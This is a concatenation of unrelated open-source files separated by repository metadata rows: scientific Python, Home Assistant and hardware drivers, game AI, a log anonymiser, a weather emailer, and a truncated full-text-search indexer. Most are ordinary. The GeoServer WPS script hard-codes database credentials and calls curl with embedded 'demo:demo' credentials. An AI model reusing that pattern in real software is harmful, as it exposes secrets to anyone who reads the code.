worksheet4.set_row(11, None, None, {'level': 2})
worksheet4.set_row(12, None, None, {'level': 1})
workbook.close()
####################################################
got, exp = _compare_xlsx_files(self.got_filename,
self.exp_filename,
self.ignore_files,
self.ignore_elements)
self.assertEqual(got, exp)
def tearDown(self):
# Cleanup.
if os.path.exists(self.got_filename):
os.remove(self.got_filename)
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | -6,489,329,900,518,712,000 | 31.47619 | 101 | 0.522727 | false | 3.783634 | true | false | false |
prasunroypr/digit-recognizer | source/defs.py | 1 | 6607 | ################################################################################
"""
Functions for Digit Recognition
Created on Wed Jun 01 00:00:00 2016
@author: Prasun Roy
@e-mail: [email protected]
"""
################################################################################
# import modules
import matplotlib.pyplot as pplt
import numpy as np
import os
import pandas as pd
import skimage.feature as skim
import sklearn.preprocessing as pp
import time
from conf import _config
from conf import _configinfo
################################################################################
def _fscale(data, split=False, load=False, verbose=False):
# initialize scaler
scaler = pp.MinMaxScaler()
# initialize variables
config = _configinfo()
sdpath = config['root_data_path'] + 'scaled.npy'
# scale data
if verbose: print('scaling features............... ', end = '')
data = np.array(data, dtype='float64')
if load and os.path.isfile(sdpath):
m = np.load(sdpath)[0]
r = np.load(sdpath)[1]
r[r==0] = 1
data = (data - m) / r
elif split:
train = data[:config['train_d']]
valid = data[config['train_d']:]
scaler.fit(train)
m = scaler.data_min_
r = scaler.data_range_
train = scaler.transform(train)
valid = scaler.transform(valid)
data = np.vstack((train, valid))
else:
data = scaler.fit_transform(data)
m = scaler.data_min_
r = scaler.data_range_
if verbose: print('done')
# save scaled config
if not load: np.save(sdpath, np.vstack((m, r)))
# return scaled data
return data
################################################################################
def _haar(data, load=True, save=False, verbose=False):
return data
################################################################################
def _hogs(data, load=True, save=False, verbose=False):
# initialize config
config = _config()
# initialize variables
datapath = config['hogs_data_path']
data_hog = []
# load hog data if exists
if load and os.path.isfile(datapath):
if verbose: print('loading descriptors............ ', end = '')
data_hog = np.load(datapath)
if verbose: print('done')
# calculate hog data otherwise
else:
# initialize variables
ix = config['shape_x']
iy = config['shape_y']
bn = config['bins_n']
cx = config['cell_x']
cy = config['cell_y']
bw = config['blok_w']
bh = config['blok_h']
# perform hog
t_beg = time.time()
size = data.shape[0]
loop = 0
for image in data:
if verbose: print('\rextracting descriptors......... %d%%'
%(loop*100//size), end = '')
desc = skim.hog(image.reshape(ix, iy), orientations=bn,
pixels_per_cell=(cx, cy), cells_per_block=(bw, bh))
data_hog.append(desc)
loop = loop + 1
data_hog = np.array(data_hog, dtype='float64')
t_end = time.time()
if verbose: print('\rextracting descriptors......... done @ %8.2f sec'
%(t_end - t_beg))
# save data
if save:
if verbose: print('saving descriptors............. ', end = '')
np.save(datapath, data_hog)
if verbose: print('done')
# return hog
return data_hog
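# Note: with skimage.hog the per-image descriptor length works out to roughly
# (ix//cx - bw + 1) * (iy//cy - bh + 1) * bw * bh * bn (block step of one cell),
# so the width of data_hog follows from the shape/cell/block/bin config values.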
################################################################################
def _sift(data, load=True, save=False, verbose=False):
return data
################################################################################
def _surf(data, load=True, save=False, verbose=False):
return data
################################################################################
def _plot(classifier, train, valid, step=None, save=False, verbose=False):
# initialize config
config = _config()
# initialize variables
if step is None: step = config['steps_d']
plot_figs_head = config['classifier'] + '-' + config['preprocess']
plot_data_path = config['plot_data_path']
plot_figs_path = config['plot_figs_path']
m_train = train.shape[0]
m_valid = valid.shape[0]
X_valid = valid[:, 1:]
y_valid = valid[:, 0]
error_train = []
error_valid = []
sizes_train = []
# calculate data for plot
for i in range(0, m_train, step):
if verbose: print('\rgenerating plot................ %d%%'
%(i*100//m_train), end = '')
# randomly shuffle training data
np.random.shuffle(train)
# select subset of randomized training data
X_train = train[:i+step, 1:]
y_train = train[:i+step, 0]
# train classifier with selected data
classifier.fit(X_train, y_train)
# cross-validate classifier
p_train = classifier.predict(X_train)
p_valid = classifier.predict(X_valid)
# estimate errors
error_train.append(sum(y_train != p_train) / len(y_train))
error_valid.append(sum(y_valid != p_valid) / m_valid)
sizes_train.append(i+step)
error_train = np.array(error_train, dtype='float64')
error_valid = np.array(error_valid, dtype='float64')
sizes_train = np.array(sizes_train, dtype='uint32')
if verbose: print('\rgenerating plot................ done')
# plot data
pplt.plot(sizes_train, error_train, 'rs-', label='training error')
pplt.plot(sizes_train, error_valid, 'gs-', label='cross-validation error')
pplt.title(plot_figs_head.upper()+' Learning Curve')
pplt.xlabel('number of training instances')
pplt.ylabel('classification error')
pplt.legend()
xmin,xmax = pplt.xlim()
ymin,ymax = pplt.ylim()
pplt.axis([xmin, xmax+step, ymin, ymax+0.01])
pplt.grid(True)
# save data
if save:
if verbose: print('saving plot.................... ', end = '')
data = pd.DataFrame({'x1_TrainSizes':sizes_train,
'y1_TrainError':error_train,
'y2_ValidError':error_valid})
data.to_csv(plot_data_path, index=False)
pplt.savefig(plot_figs_path)
if verbose: print('done')
# display plot
pplt.show()
################################################################################
| gpl-3.0 | -7,425,339,864,518,901,000 | 29.16895 | 80 | 0.49493 | false | 4.050889 | true | false | false |
partofthething/home-assistant | homeassistant/components/pushsafer/notify.py | 1 | 6128 | """Pushsafer platform for notify component."""
import base64
import logging
import mimetypes
import requests
from requests.auth import HTTPBasicAuth
import voluptuous as vol
from homeassistant.components.notify import (
ATTR_DATA,
ATTR_TARGET,
ATTR_TITLE,
ATTR_TITLE_DEFAULT,
PLATFORM_SCHEMA,
BaseNotificationService,
)
from homeassistant.const import ATTR_ICON, HTTP_OK
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
_RESOURCE = "https://www.pushsafer.com/api"
_ALLOWED_IMAGES = ["image/gif", "image/jpeg", "image/png"]
CONF_DEVICE_KEY = "private_key"
CONF_TIMEOUT = 15
# Top level attributes in 'data'
ATTR_SOUND = "sound"
ATTR_VIBRATION = "vibration"
ATTR_ICONCOLOR = "iconcolor"
ATTR_URL = "url"
ATTR_URLTITLE = "urltitle"
ATTR_TIME2LIVE = "time2live"
ATTR_PRIORITY = "priority"
ATTR_RETRY = "retry"
ATTR_EXPIRE = "expire"
ATTR_ANSWER = "answer"
ATTR_PICTURE1 = "picture1"
# Attributes contained in picture1
ATTR_PICTURE1_URL = "url"
ATTR_PICTURE1_PATH = "path"
ATTR_PICTURE1_USERNAME = "username"
ATTR_PICTURE1_PASSWORD = "password"
ATTR_PICTURE1_AUTH = "auth"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({vol.Required(CONF_DEVICE_KEY): cv.string})
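# Minimal configuration sketch (assumed YAML; only the key required by the
# schema above, with a placeholder value):
#
#   notify:
#     - platform: pushsafer
#       private_key: YOUR_PRIVATE_DEVICE_KEY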
def get_service(hass, config, discovery_info=None):
"""Get the Pushsafer.com notification service."""
return PushsaferNotificationService(
config.get(CONF_DEVICE_KEY), hass.config.is_allowed_path
)
class PushsaferNotificationService(BaseNotificationService):
"""Implementation of the notification service for Pushsafer.com."""
def __init__(self, private_key, is_allowed_path):
"""Initialize the service."""
self._private_key = private_key
self.is_allowed_path = is_allowed_path
def send_message(self, message="", **kwargs):
"""Send a message to specified target."""
if kwargs.get(ATTR_TARGET) is None:
targets = ["a"]
_LOGGER.debug("No target specified. Sending push to all")
else:
targets = kwargs.get(ATTR_TARGET)
_LOGGER.debug("%s target(s) specified", len(targets))
title = kwargs.get(ATTR_TITLE, ATTR_TITLE_DEFAULT)
data = kwargs.get(ATTR_DATA, {})
# Converting the specified image to base64
picture1 = data.get(ATTR_PICTURE1)
picture1_encoded = ""
if picture1 is not None:
_LOGGER.debug("picture1 is available")
url = picture1.get(ATTR_PICTURE1_URL, None)
local_path = picture1.get(ATTR_PICTURE1_PATH, None)
username = picture1.get(ATTR_PICTURE1_USERNAME)
password = picture1.get(ATTR_PICTURE1_PASSWORD)
auth = picture1.get(ATTR_PICTURE1_AUTH)
if url is not None:
_LOGGER.debug("Loading image from url %s", url)
picture1_encoded = self.load_from_url(url, username, password, auth)
elif local_path is not None:
_LOGGER.debug("Loading image from file %s", local_path)
picture1_encoded = self.load_from_file(local_path)
else:
_LOGGER.warning("missing url or local_path for picture1")
else:
_LOGGER.debug("picture1 is not specified")
payload = {
"k": self._private_key,
"t": title,
"m": message,
"s": data.get(ATTR_SOUND, ""),
"v": data.get(ATTR_VIBRATION, ""),
"i": data.get(ATTR_ICON, ""),
"c": data.get(ATTR_ICONCOLOR, ""),
"u": data.get(ATTR_URL, ""),
"ut": data.get(ATTR_URLTITLE, ""),
"l": data.get(ATTR_TIME2LIVE, ""),
"pr": data.get(ATTR_PRIORITY, ""),
"re": data.get(ATTR_RETRY, ""),
"ex": data.get(ATTR_EXPIRE, ""),
"a": data.get(ATTR_ANSWER, ""),
"p": picture1_encoded,
}
for target in targets:
payload["d"] = target
response = requests.post(_RESOURCE, data=payload, timeout=CONF_TIMEOUT)
if response.status_code != HTTP_OK:
_LOGGER.error("Pushsafer failed with: %s", response.text)
else:
_LOGGER.debug("Push send: %s", response.json())
@classmethod
def get_base64(cls, filebyte, mimetype):
"""Convert the image to the expected base64 string of pushsafer."""
if mimetype not in _ALLOWED_IMAGES:
_LOGGER.warning("%s is a not supported mimetype for images", mimetype)
return None
base64_image = base64.b64encode(filebyte).decode("utf8")
return f"data:{mimetype};base64,{base64_image}"
def load_from_url(self, url=None, username=None, password=None, auth=None):
"""Load image/document/etc from URL."""
if url is not None:
_LOGGER.debug("Downloading image from %s", url)
if username is not None and password is not None:
auth_ = HTTPBasicAuth(username, password)
response = requests.get(url, auth=auth_, timeout=CONF_TIMEOUT)
else:
response = requests.get(url, timeout=CONF_TIMEOUT)
return self.get_base64(response.content, response.headers["content-type"])
_LOGGER.warning("url not found in param")
return None
def load_from_file(self, local_path=None):
"""Load image/document/etc from a local path."""
try:
if local_path is not None:
_LOGGER.debug("Loading image from local path")
if self.is_allowed_path(local_path):
file_mimetype = mimetypes.guess_type(local_path)
_LOGGER.debug("Detected mimetype %s", file_mimetype)
with open(local_path, "rb") as binary_file:
data = binary_file.read()
return self.get_base64(data, file_mimetype[0])
else:
_LOGGER.warning("Local path not found in params!")
except OSError as error:
_LOGGER.error("Can't load from local path: %s", error)
return None
| mit | -6,397,761,538,905,725,000 | 35.915663 | 86 | 0.602807 | false | 3.794427 | false | false | false |
thortex/rpi3-webiopi | webiopi_0.7.1/python/webiopi/devices/onewire.py | 1 | 2571 | # Copyright 2012-2013 Eric Ptak - trouch.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from webiopi.devices.bus import Bus, loadModule
EXTRAS = {
"TEMP": {"loaded": False, "module": "w1-therm"},
"2408": {"loaded": False, "module": "w1_ds2408"},
"2413": {"loaded": False, "module": "w1_ds2413"}
}
def loadExtraModule(name):
if EXTRAS[name]["loaded"] == False:
loadModule(EXTRAS[name]["module"])
EXTRAS[name]["loaded"] = True
class OneWire(Bus):
def __init__(self, slave=None, family=0, extra=None):
Bus.__init__(self, "ONEWIRE", "/sys/bus/w1/devices/w1_bus_master1/w1_master_slaves", os.O_RDONLY)
if self.fd > 0:
os.close(self.fd)
self.fd = 0
self.family = family
if slave != None:
addr = slave.split("-")
if len(addr) == 1:
self.slave = "%02x-%s" % (family, slave)
elif len(addr) == 2:
prefix = int(addr[0], 16)
if family > 0 and family != prefix:
raise Exception("1-Wire slave address %s does not match family %02x" % (slave, family))
self.slave = slave
else:
devices = self.deviceList()
if len(devices) == 0:
raise Exception("No device match family %02x" % family)
self.slave = devices[0]
loadExtraModule(extra)
def __str__(self):
return "1-Wire(slave=%s)" % self.slave
def deviceList(self):
devices = []
with open(self.device) as f:
lines = f.read().split("\n")
if self.family > 0:
prefix = "%02x-" % self.family
for line in lines:
if line.startswith(prefix):
devices.append(line)
else:
devices = lines
return devices;
def read(self):
with open("/sys/bus/w1/devices/%s/w1_slave" % self.slave) as f:
data = f.read()
return data
| apache-2.0 | -53,284,425,979,220,800 | 33.743243 | 107 | 0.558149 | false | 3.709957 | false | false | false |
NumCosmo/NumCosmo | examples/example_ode_spline.py | 1 | 1165 | #!/usr/bin/env python
try:
import gi
gi.require_version('NumCosmo', '1.0')
gi.require_version('NumCosmoMath', '1.0')
except:
pass
import ctypes
from math import *
from gi.repository import NumCosmoMath as Ncm
from gi.repository import NumCosmo as Nc
from gi.repository import GObject
#
# Initializing the library objects, this must be called before
# any other library function.
#
Ncm.cfg_init ()
class TestClass (Ncm.Model):
def __call__ (self, *args):
return args[0]
aas = TestClass ()
def test (y, x, data):
return y
test.argtypes = [ctypes.c_double, ctypes.c_double, ctypes.c_char_p]
test.restype = ctypes.c_double
s = Ncm.SplineCubicNotaknot.new ()
os = Ncm.OdeSpline.new (s, test)
os.set_reltol (1.0e-3)
os.props.xi = 0.0
os.props.xf = 5.0
os.props.yi = 1.0
nhaca = [1,2,3,4]
os.prepare (id (nhaca))
ss = os.peek_spline()
for i in range (ss.len):
print ("%d % 22.15g % 22.15g % 22.15g % 22.15g % 22.15g" % (i, ss.xv.get (i), ss.yv.get (i), ss.b.get (i), ss.c.get(i), ss.d.get(i)))
#for i in range (100):
# x = 1.0 / 99.0 * i
# expx = exp (x)
# odex = ss.eval (x)
# print (x, expx, odex, fabs ((expx - odex) / expx))
| gpl-3.0 | 8,754,895,868,490,639,000 | 19.438596 | 137 | 0.64206 | false | 2.377551 | true | false | false |
Geodan/natuurbandmodel | server-wps/wildfire_makelcp.py | 1 | 1431 | from geoserver.wps import process
from com.ziclix.python.sql import zxJDBC
jdbc_url = "jdbc:postgresql://192.168.40.5:3389/research"
username = "modeluser"
password = "modeluser"
driver = "org.postgresql.Driver"
cgi_url = "http://model.geodan.nl/main/gmi/cgi-bin/"
@process(
title='MakeLcp',
description='Build landscape file',
inputs={
'userid' : (int, 'User ID'),
'terreinid': (int,'Terrein ID'),
'landscapename': (str,'Name of landscape')
},
outputs={
'string': (str,'JSON string')
}
)
def run(userid, terreinid, landscapename):
#Connect to postgres
conn = zxJDBC.connect(jdbc_url,username, password, driver)
cur = conn.cursor()
query = """
INSERT INTO administration.runs ("user", model, status, percentage, lastupdate) VALUES (?,?,?, ?, now());
"""
data = [1,4,"scheduled",0]
cur.execute(query, data)
conn.commit()
query = """SELECT MAX(id) FROM administration.runs;"""
cur.execute(query)
result = cur.fetchone()
runid = result[0]
query = """
INSERT INTO administration.params_makelcp
(run, terrein_id, terrein_name)
VALUES
(?, ?, ?);
"""
data = [runid,terreinid,landscapename]
cur.execute(query, data )
conn.commit()
import subprocess
p = subprocess.Popen(['/usr/bin/curl','-u', 'demo:demo',cgi_url+'makeLcp.py'])
p.daemon = True
return '{"runid":'+str(runid)+',"status":"scheduled","percentage":0}'
| mit | 4,120,670,946,866,093,600 | 25 | 108 | 0.638714 | false | 2.873494 | false | false | false |
chaowu2009/stereo-vo | tools/capture_TwoCameras_saveImagesOnly.py | 1 | 2289 | import numpy as np
import cv2
import time
import matplotlib.pylab as plt
"""
Make sure that you hold the checkerboard horizontally (more checkers horizontally than vertically).
In order to get a good calibration you will need to move the checkerboard around in the camera frame such that:
the checkerboard is detected at the left and right edges of the field of view (X calibration)
the checkerboard is detected at the top and bottom edges of the field of view (Y calibration)
the checkerboard is detected at various angles to the camera ("Skew")
the checkerboard fills the entire field of view (Size calibration)
checkerboard tilted to the left, right, top and bottom (X,Y, and Size calibration)
"""
left = 1
right = 2
time_in_ms= 1000/100
#folder = "/home/cwu/Downloads/";
folder = "/home/hillcrest/project/stereo-calibration/calib_imgs/ARC/"
folder = "/home/hillcrest/project/stereo-calibration/calib_imgs/ARC/"
#folder = "D:/vision/stereo-calibration/calib_imgs/ARC/"
fp = open(folder + "timeStamp.txt","w")
WIDTH = 1280
HEIGHT = 720
WIDTH = 640
HEIGHT = 480
for counter in range(1,31):
millis = int(round(time.time() * 1000))
cap1 = cv2.VideoCapture(left)
cap1.set(cv2.CAP_PROP_FRAME_WIDTH,WIDTH)
cap1.set(cv2.CAP_PROP_FRAME_HEIGHT,HEIGHT)
cv2.waitKey(100)
ret, frame1 = cap1.read()
cap1.release()
cap2 = cv2.VideoCapture(right)
cap2.set(cv2.CAP_PROP_FRAME_WIDTH,WIDTH)
cap2.set(cv2.CAP_PROP_FRAME_HEIGHT,HEIGHT)
cv2.waitKey(100)
ret, frame2 = cap2.read()
cap2.release()
#frame1 = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY)
#frame2 = cv2.cvtColor(frame2, cv2.COLOR_BGR2GRAY)
# Display the resulting frame
plt.subplot(121)
plt.imshow(frame1)
plt.title('left')
plt.subplot(122)
plt.imshow(frame2)
plt.title('right')
plt.show()
print('another capture', counter)
cv2.waitKey(100)
cv2.imwrite(folder + "img_left/left_" + str(counter) + ".jpg", frame1)
cv2.waitKey(time_in_ms)
cv2.imwrite(folder + "img_right/right_" + str(counter) + ".jpg", frame2)
fp.write(str(counter)+ ","+ str(millis) + "\n")
print("the ", counter, " pairs")
cv2.destroyAllWindows()
fp.close()
print('All Done \n')
| mit | -5,414,921,834,074,587,000 | 25.929412 | 111 | 0.678462 | false | 3.093243 | false | false | false |
dnikulin/jula | scripts/make_classes.py | 1 | 3287 | # Copyright (C) 2011 Dmitri Nikulin
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from common import SIZES, classname, mklabel, cells, startfile
def genmatrix(rows, cols):
myclass = classname(rows, cols)
fd = startfile("fixed", myclass)
def line(s=""):
print >> fd, s
traits = [("Matrix_%d_N" % rows), ("Matrix_M_%d" % cols)]
if (rows == cols):
traits.append("Matrix_M_M")
for trait in traits:
line("import org.dnikulin.jula.traits.%s;" % trait)
line()
line("import org.dnikulin.jula.functions.Copy;")
line()
line("public final class %s implements %s {" % (myclass, ", ".join(traits)))
line(" public static final int rows = %d;" % rows)
line(" public static final int cols = %d;" % cols)
line(" public static final int size = (rows * cols);")
line()
for row in range(rows):
labels = ", ".join([mklabel(row, col) for col in range(cols)])
line(" public double %s;" % labels)
line()
line(" @Override")
line(" public int getRows() {")
line(" return rows;")
line(" }")
line()
line(" @Override")
line(" public int getCols() {")
line(" return cols;")
line(" }")
line()
line(" @Override")
line(" public double get(final int row, final int col) {")
line(" assert(row >= 0);")
line(" assert(col >= 0);")
line(" assert(row < rows);")
line(" assert(col < cols);")
line()
line(" switch ((row * cols) + col) {")
for (row, col, label) in cells(rows, cols):
off = (row * cols) + col
line(" case %2d: return %s;" % (off, label))
line(" default: return 0;")
line(" }")
line(" }")
line()
line(" @Override")
line(" public void set(final int row, final int col, final double val) {")
line(" assert(row >= 0);")
line(" assert(col >= 0);")
line(" assert(row < rows);")
line(" assert(col < cols);")
line()
line(" switch ((row * cols) + col) {")
for (row, col, label) in cells(rows, cols):
off = (row * cols) + col
line(" case %2d: %s = val; return;" % (off, label))
line(" default: return;")
line(" }")
line(" }")
line()
line(" @Override")
line(" public %s clone() {" % (myclass))
line(" final %s that = new %s();" % (myclass, myclass))
line(" Copy.copy(this, that);")
line(" return that;")
line(" }")
line("}")
fd.flush()
fd.close()
if __name__ == '__main__':
for rows in SIZES:
for cols in SIZES:
genmatrix(rows, cols)
| apache-2.0 | -7,478,729,938,186,849,000 | 30.912621 | 81 | 0.531488 | false | 3.542026 | false | false | false |
MarkusHackspacher/unknown-horizons | horizons/ai/aiplayer/building/firestation.py | 1 | 3179 | # ###################################################
# Copyright (C) 2008-2017 The Unknown Horizons Team
# [email protected]
# This file is part of Unknown Horizons.
#
# Unknown Horizons is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
# ###################################################
from horizons.ai.aiplayer.basicbuilder import BasicBuilder
from horizons.ai.aiplayer.building import AbstractBuilding
from horizons.ai.aiplayer.buildingevaluator import BuildingEvaluator
from horizons.ai.aiplayer.constants import BUILDING_PURPOSE
from horizons.constants import BUILDINGS
class AbstractFireStation(AbstractBuilding):
def iter_potential_locations(self, settlement_manager):
spots_in_settlement = settlement_manager.settlement.buildability_cache.cache[(2, 2)]
village_builder = settlement_manager.village_builder
for coords in village_builder.special_building_assignments[BUILDING_PURPOSE.FIRE_STATION].keys():
if coords not in spots_in_settlement or village_builder.plan[coords][1][0] > village_builder.current_section:
continue
object = settlement_manager.settlement.ground_map[coords].object
if object is None or object.buildable_upon:
yield (coords[0], coords[1], 0)
@property
def producer_building(self):
"""Fire stations don't produce any resources."""
return False
@property
def evaluator_class(self):
return FireStationEvaluator
@classmethod
def register_buildings(cls):
cls._available_buildings[BUILDINGS.FIRE_STATION] = cls
class FireStationEvaluator(BuildingEvaluator):
need_collector_connection = False
record_plan_change = False
@classmethod
def create(cls, production_builder, x, y, orientation):
settlement_manager = production_builder.settlement_manager
village_builder = settlement_manager.village_builder
builder = BasicBuilder.create(BUILDINGS.FIRE_STATION, (x, y), orientation)
assigned_residences = village_builder.special_building_assignments[BUILDING_PURPOSE.FIRE_STATION][(x, y)]
total = len(assigned_residences)
not_serviced = 0
for residence_coords in assigned_residences:
if village_builder.plan[residence_coords][0] == BUILDING_PURPOSE.RESIDENCE:
not_serviced += 1
if not_serviced <= 0 or not_serviced < total * settlement_manager.owner.personality_manager.get('AbstractFireStation').fraction_of_assigned_residences_built:
return None
return FireStationEvaluator(village_builder, builder, not_serviced)
@property
def purpose(self):
return BUILDING_PURPOSE.FIRE_STATION
AbstractFireStation.register_buildings()
| gpl-2.0 | -1,032,238,161,009,814,300 | 38.246914 | 159 | 0.754954 | false | 3.563901 | false | false | false |
EDUlib/eTracesX | Scripts/ExtractCours.py | 1 | 2359 | #!/usr/bin/python
import sys
import getopt
import re
import random
def main(argv):
inputfile = ''
outputfile = ''
try:
opts, args = getopt.getopt(argv,"hi:o:",["ifile=","ofile="])
except getopt.GetoptError:
print 'test.py -i <inputfile> -o <outputfile>'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'test.py -i <inputfile> -o <outputfile>'
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt in ("-o", "--ofile"):
outputfile = arg
print 'Input file is :', inputfile
print 'Output file is :', outputfile
if inputfile == '' or outputfile == '':
sys.exit()
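# pUser captures the "username" field of each JSON log line; pCours keeps only
# lines belonging to the ITES.1 course. Matching usernames are replaced below by
# random 16-character hex pseudonyms so the traces can be shared anonymously.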
pUser =re.compile('"username": "([\w.@&\-]*)"')
pCours =re.compile('ITES\.1')
nameDict = dict()
f = open(inputfile, "r")
copy = open(outputfile, "w")
for line in f:
mCours = pCours.search(line)
if mCours:
mUser = pUser.findall(line)
newLine = ''
if len(mUser) == 1:
if mUser[0] != '':
if not nameDict.has_key(mUser[0]):
newName = ''.join(random.SystemRandom().choice('0123456789ABCDEF') for _ in range(16))
i = 0;
while (newName in nameDict.values()) and i < 1000:
newName = ''.join(random.SystemRandom().choice('0123456789ABCDEF') for _ in range(16))
i = i+1;
if i == 1000:
print "Can't find a name :", mUser[0]
sys.exit()
nameDict[mUser[0]] = newName;
# print 'Username is :', mUser[0], ' --- newName :', nameDict[mUser[0]]
newLine = re.sub('"username": "'+ mUser[0] + '"', '"username": "' + nameDict[mUser[0]] + '"', line)
# newLine = re.sub('"username": "'+ mUser[0] + '"', '"username": "' + mUser[0] + '"', line)
# newLine = line
else:
newLine = line
else:
print line
sys.exit()
if newLine != '':
copy.write(newLine)
f.close()
copy.close()
if __name__ == "__main__":
main(sys.argv[1:])
| agpl-3.0 | 3,712,799,693,199,665,700 | 34.208955 | 119 | 0.447647 | false | 3.804839 | false | false | false |
inflatus/Python | Weather/weather_email.py | 1 | 2252 | # using JSON and the WeatherUnderground API
# parsing data and emailing it to myself
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import urllib.request
import json
from API_KEYS import EMAIL_ADDRESS, EMAIL_PASSWORD
from API_KEYS import WEATHER_UNDERGROUND_KEY
# getting the url
f = urllib.request.urlopen('http://api.wunderground.com/api/' + WEATHER_UNDERGROUND_KEY + '/geolookup/conditions/q/IN/Martinsville.json')
# decoding the text
json_string = f.read().decode('utf-8')
# parsing the information
parsed_json = json.loads(json_string)
location = parsed_json['location']['city']
temp_f = parsed_json['current_observation']['temp_f']
relative_humidity = parsed_json['current_observation']['relative_humidity']
wind_mph = parsed_json['current_observation']['wind_mph']
wind_gust = parsed_json['current_observation']['wind_gust_mph']
pressure_mb = parsed_json['current_observation']['pressure_mb']
feels_like = parsed_json['current_observation']['feelslike_f']
visibility_mi = parsed_json['current_observation']['visibility_mi']
precipitation_in = parsed_json['current_observation']['precip_today_in']
weather = parsed_json['current_observation']['weather']
# assemble the weather report body from the parsed fields
data = (('Current temperature in {} is: {} F\n'.format(location, temp_f)) +
('Relative Humidity is at: {}\n'.format(relative_humidity)) +
('Winds are: {} mph\n'.format(wind_mph)) +
('Wind gusts are at: {} mph\n'.format(wind_gust)) +
('Pressure is: {} mb\n'.format(pressure_mb)) +
('Feels like: {} F\n'.format(feels_like)) +
('Visibility is: {} mi\n'.format(visibility_mi)) +
('Precipitation today: {} inches\n'.format(precipitation_in)) +
('General weather is: {}'.format(weather)))
# compose email message
fromaddr = (EMAIL_ADDRESS)
toaddr = (EMAIL_ADDRESS)
msg = MIMEMultipart()
msg['From'] = fromaddr
msg['To'] = toaddr
msg['Subject'] = "Current Weather"
body = (data)
msg.attach(MIMEText(body, 'plain'))
# authenticate and send email
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(fromaddr, (EMAIL_PASSWORD))
text = msg.as_string()
server.sendmail(fromaddr, toaddr, text)
server.quit()
| mit | -1,424,017,478,444,561,400 | 36.533333 | 137 | 0.709147 | false | 3.273256 | false | false | false |
academic-colab/maslo-server | FTS.py | 1 | 5261 | #!/usr/bin/env python
'''
/******************************************************************************
* FTS.py
*
* Copyright (c) 2011-2012, Academic ADL Co-Lab, University of Wisconsin-Extension
* http://www.academiccolab.org/
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public
* License as published by the Free Software Foundation; either
* version 3 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
* MA 02110-1301 USA
*****************************************************************************/
'''
import sys
import os
import json
import urllib2
import re
import sqlite3 as dbs
## Reads a json file and returns a json object
def getJSON(path, isRelative=True):
if isRelative :
fPath = path + "/manifest"
else :
fPath = path
try :
f = open(fPath)
except :
print "File ", fPath, " cannot be opened."
return None
else :
data = json.load(f)
f.close()
return data
## Strip string passed as argument from common stopwords
def removeStopWords(text):
stopwords = ""
try :
f = open("stopwords.txt", "r")
except :
f = urllib2.urlopen('http://www.textfixer.com/resources/common-english-words.txt')
stopwords = f.read()
f = open("stopwords.txt", "w")
f.write(stopwords)
f.close()
else :
stopwords = f.read()
f.close()
stopwords = stopwords.strip().split(",")
for stopword in stopwords :
pattern = re.compile(r"\b%s\b"%stopword, re.IGNORECASE)
text = pattern.sub("", text)
pattern = re.compile("[\s]+")
text = pattern.sub(" ", text)
return text
## Create full text search table for pack contents
def createTable(db):
statement = "CREATE VIRTUAL TABLE content_search using FTS3(pack,section,content,tokenize=porter);"
try :
db.execute(statement)
db.commit()
except:
pass
## Create basic content pack table
def createTableUpper(db):
statement = "CREATE TABLE content (pack text, path text, version text, author text, public int DEFAULT 0, category text);"
try :
db.execute(statement)
db.commit()
except:
pass
## insert data into content pack tables - FTS and basic
def insertData(pack, path, db, zipName=None, versionPath=None, author=None):
data = getJSON(path)
query = "INSERT INTO content_search(pack, section, content) VALUES (?,?,?)"
query2 = "INSERT INTO content(pack, path, version, author, category) VALUES (?,?,?,?,?)"
if zipName :
version = "0"
category = ""
authorVal = ""
if versionPath is not None and author is not None :
print versionPath
versionData = getJSON(versionPath, False)
if versionData and "version" in versionData :
version = versionData["version"]
if versionData and "category" in versionData :
category = versionData["category"]
authorVal = author
try :
zn = zipName.replace("qDir-", "")
db.execute(query2, (pack.decode('utf-8'), zn.decode('utf-8'),version, authorVal.decode('utf-8'), category))
except Exception, e:
print "Insert failed: ",pack, zn, version, authorVal
print e
pass
pattern = re.compile("<[^>]+>")
print data
for entry in data :
title = entry["title"]
normalTitle = removeStopWords(title)
try :
db.execute(query, (pack.decode('utf-8'), title, normalTitle,))
except Exception, e:
print "error:", e
return
text = None
uPath = path.decode('utf-8')
if entry["type"] == "text" :
newPath = uPath+"/../"+entry["path"]
f = open(newPath)
text = f.read().strip()
f.close()
else :
newPath = uPath+"/../"+ entry["path"]+".dsc"
try :
f = open(newPath)
text = f.read().strip()
f.close()
except :
pass
